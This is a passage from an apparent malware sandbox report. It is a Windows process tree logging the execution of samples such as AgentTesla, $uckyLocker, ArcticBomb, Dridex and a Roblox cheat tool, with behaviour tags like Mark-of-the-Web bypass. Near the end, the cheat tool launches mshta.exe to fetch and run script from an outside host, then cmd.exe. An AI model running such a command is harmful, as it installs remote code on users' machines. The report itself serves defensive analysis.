  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10556 /prefetch:8
  2⤵
  PID:1944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\Admin\Downloads\Roblox.Arceus.X.Admin.1.0.9.apk"
  2⤵
  PID:7116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
    3⤵
    PID:5740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9088 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9240 /prefetch:1
  2⤵
  PID:6160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8576 /prefetch:8
  2⤵
  PID:5340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\Admin\Downloads\Roblox.Arceus.X.Admin.1.0.9.apk"
  2⤵
  PID:6860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
    3⤵
    PID:6180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10444 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9528 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10736 /prefetch:8
  2⤵
  PID:6216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10216 /prefetch:1
  2⤵
  PID:876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10584 /prefetch:1
  2⤵
  PID:6152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10628 /prefetch:1
  2⤵
  PID:6568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10512 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10600 /prefetch:1
  2⤵
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9724 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10828 /prefetch:1
  2⤵
  PID:1444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10216 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10672 /prefetch:1
  2⤵
  PID:7960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11232 /prefetch:8
  2⤵
  PID:8060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11092 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:8132
- C:\Users\Admin\Downloads\ArcticBomb.exe
  "C:\Users\Admin\Downloads\ArcticBomb.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:7084
- C:\Users\Admin\Downloads\ArcticBomb.exe
  "C:\Users\Admin\Downloads\ArcticBomb.exe"
  2⤵
  - Executes dropped EXE
  PID:7272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10336 /prefetch:1
  2⤵
  PID:7352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11200 /prefetch:8
  2⤵
  PID:7388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10812 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:7540
- C:\Users\Admin\Downloads\$uckyLocker.exe
  "C:\Users\Admin\Downloads\$uckyLocker.exe"
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:7660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11144 /prefetch:1
  2⤵
  PID:5392
- C:\Users\Admin\Downloads\$uckyLocker.exe
  "C:\Users\Admin\Downloads\$uckyLocker.exe"
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:7236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11240 /prefetch:1
  2⤵
  PID:7468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10860 /prefetch:8
  2⤵
  PID:5180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10812 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:1992
- C:\Users\Admin\Downloads\AgentTesla.exe
  "C:\Users\Admin\Downloads\AgentTesla.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:8056
- C:\Users\Admin\Downloads\AgentTesla.exe
  "C:\Users\Admin\Downloads\AgentTesla.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:6268

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
  2⤵
  PID:4644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
    3⤵
    PID:648

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3808
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
  2⤵
  PID:3648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:3128
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1932 -parentBuildID 20240401114208 -prefsHandle 1848 -prefMapHandle 1840 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d14e30d7-cc9f-4a1a-9b90-2b69236c972d} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" gpu
      4⤵
      PID:3224
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12335257-2d54-4881-a57d-0c5456f4a84f} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" socket
      4⤵
      Checks processor information in registry
      PID:1508
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2996 -childID 1 -isForBrowser -prefsHandle 2624 -prefMapHandle 2628 -prefsLen 24739 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27d2da09-b3f1-4635-993b-cd51a11ce5bc} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" tab
      4⤵
      PID:1552
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3356 -childID 2 -isForBrowser -prefsHandle 3428 -prefMapHandle 3620 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0839b757-74ff-46b5-8bff-2c3aae0c9a03} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" tab
      4⤵
      PID:3568
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4204 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4220 -prefMapHandle 4216 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fa2eb68-655f-4126-879a-84841402036e} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" utility
      4⤵
      Checks processor information in registry
      PID:5340
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 3 -isForBrowser -prefsHandle 5636 -prefMapHandle 5536 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6552397-c3e2-4dad-a4fb-ba4801eb4c97} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" tab
      4⤵
      PID:5332
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 4 -isForBrowser -prefsHandle 5776 -prefMapHandle 5780 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {872fe84a-319a-4530-897d-93990038af37} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" tab
      4⤵
      PID:5356
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5940 -childID 5 -isForBrowser -prefsHandle 5948 -prefMapHandle 5952 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {45a1c70e-3651-4cf0-98f8-86f48158af88} 3128 "\\.\pipe\gecko-crash-server-pipe.3128" tab
      4⤵
      PID:5368
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:704
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        5⤵
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5632
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1824 -parentBuildID 20240401114208 -prefsHandle 1752 -prefMapHandle 1732 -prefsLen 20321 -prefMapSize 241207 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8370f83-2131-49ed-9025-d3ced5ab7071} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" gpu
        6⤵
        
        PID:2868
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2164 -parentBuildID 20240401114208 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 20321 -prefMapSize 241207 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7add8b3-f92c-4c9e-a3fc-646a9953d08e} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" socket
        6⤵
        
        PID:6032
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3512 -childID 1 -isForBrowser -prefsHandle 3504 -prefMapHandle 3500 -prefsLen 25714 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1583cec7-9298-40ec-bc6a-3bf453d65534} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:5548
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3932 -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3924 -prefsLen 26534 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd7e0ca0-6dcc-411a-ad45-6ec2f503e63d} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:5836
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4476 -childID 3 -isForBrowser -prefsHandle 4472 -prefMapHandle 4468 -prefsLen 27719 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {955cc0a4-825a-4b2e-9ba0-71a373b8c6ac} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:2016
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3764 -parentBuildID 20240401114208 -prefsHandle 4760 -prefMapHandle 4840 -prefsLen 33525 -prefMapSize 241207 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a96659ca-e9b0-4ec2-8461-f8c30d08f775} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" rdd
        6⤵
        
        PID:2436
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5156 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5312 -prefMapHandle 5352 -prefsLen 38502 -prefMapSize 241207 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2220744a-370e-4d16-97ad-38e5ae50e285} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" utility
        6⤵
        Checks processor information in registry
        
        PID:2324
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3516 -childID 4 -isForBrowser -prefsHandle 3604 -prefMapHandle 3620 -prefsLen 32850 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5cd2a20-5273-48a8-afde-8ac4b8562c65} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:4036
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 5 -isForBrowser -prefsHandle 5580 -prefMapHandle 5564 -prefsLen 32850 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9c88c39-8791-4544-86f1-d9a97061a6b8} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:1888
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5852 -childID 6 -isForBrowser -prefsHandle 3616 -prefMapHandle 5616 -prefsLen 32850 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7e7948a-2b1e-484c-977d-9a87365bbacc} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:5944
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6124 -childID 7 -isForBrowser -prefsHandle 5680 -prefMapHandle 5700 -prefsLen 38934 -prefMapSize 241207 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76c6d870-d773-440c-be65-095dee329633} 5632 "\\.\pipe\gecko-crash-server-pipe.5632" tab
        6⤵
        
        PID:5980

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
1⤵
PID:5956
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
  2⤵
  - Checks processor information in registry
  PID:5988

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:1408
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
  2⤵
  PID:6028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
    3⤵
    - Checks processor information in registry
    PID:5236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
1⤵
PID:3148
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" "C:\Users\Admin\Downloads\Trojan.Dridex.A. dbf96ab40b728c12951d317642fbd9da_"
  2⤵
  - Checks processor information in registry
  PID:1500

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:5204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4276 -ip 4276
1⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3348 -ip 3348
1⤵
PID:3460

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004B8 0x00000000000004D0
1⤵
PID:2740

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1544

C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\Xeno.exe
"C:\Users\Admin\Downloads\Xeno-v1.1.0-x64\Xeno-v1.1.0-x64\Xeno.exe"
1⤵
PID:5516
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "http://xenosploit.com/xeno.txt"
  2⤵
  - Blocklisted process makes network request
  PID:3636
- - C:\Windows\System32\cmd.exe
